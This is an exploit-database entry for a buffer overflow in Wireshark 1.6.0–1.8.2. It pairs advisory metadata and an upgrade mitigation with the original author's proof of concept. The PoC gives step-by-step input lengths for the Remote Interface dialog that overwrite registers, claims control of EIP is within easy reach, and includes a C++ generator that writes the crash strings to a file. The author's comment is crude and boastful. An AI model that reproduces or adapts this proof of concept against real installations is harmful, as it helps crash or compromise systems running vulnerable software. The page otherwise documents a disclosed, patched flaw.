header-logo
Suggest Exploit
vendor:
Wireshark
by:
X-h4ck
7,5
CVSS
HIGH
Buffer Overflow
120 (Buffer Copy without Checking Size of Input)
CWE
Product Name: Wireshark
Affected Version From: 1.6.0
Affected Version To: 1.8.2
Patch Exists: Yes
Related CWE: N/A
CPE: a:wireshark:wireshark
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2020

WireShark Buffer Overflow 0day

A buffer overflow vulnerability exists in WireShark versions 1.8.2 and 1.6.0. An attacker can exploit this vulnerability by sending a maliciously crafted string to the Remote Interface function of WireShark. This will overwrite the EAX, ECX, EDX, and EBX registers, allowing the attacker to gain access to EIP.

Mitigation:

Upgrade to the latest version of WireShark.
Source

Exploit-DB raw data:

/*

WireShark Buffer Overflow 0day 
author: X-h4ck,mem001@live.com,www.pirate.al
greetz to people that i love and my girlfriend , and yes imm
proud to be albanian.only the poc, no exploit available so i
wont confuse the script kiddies, eax,ecx,edx,ebx overwritten
s-kiddies u can easy get access over eip if u want to.
Tested on : Windows 7 ultimate
How to use: Capture>Options>Manage Interfaces>Remote Interfaces>Add===>
Host Input : 659 As
Port Input : 652 As, now lets stop with As and add 8 Bs for funn yeep?
Then Click "OK". In this way we can trigger the vulnerability.
ive tested this dummy attack in 1.8.2 & 1.6.0 , probabbly  all version 
may be fucked, huh ? if they possess the remote inteface function.

*/


#include <cstdio>
#include <iostream>
// wrote a little shit code to generate > nicely for u those strings
using namespace std;
int main(){

  char buff1[] = "\x41";
  char buff2[] = "\x42";
  FILE *txtfile;
  txtfile = fopen("c:\\exploit.txt", "w");
  fputs("Host Input:\n",txtfile);
  for(int i=0; i < 659; i++){
    fputs(buff1,txtfile);
    }
  fputs("\n",txtfile); 
  fputs("Port Input:\n",txtfile); 
  for (int y=0; y < 652; y++) {
    fputs(buff1,txtfile);
    }
  for(int x=0; x < 8; x++) {
    fputs(buff2,txtfile);
    }
  fclose(txtfile);
  return 0;
}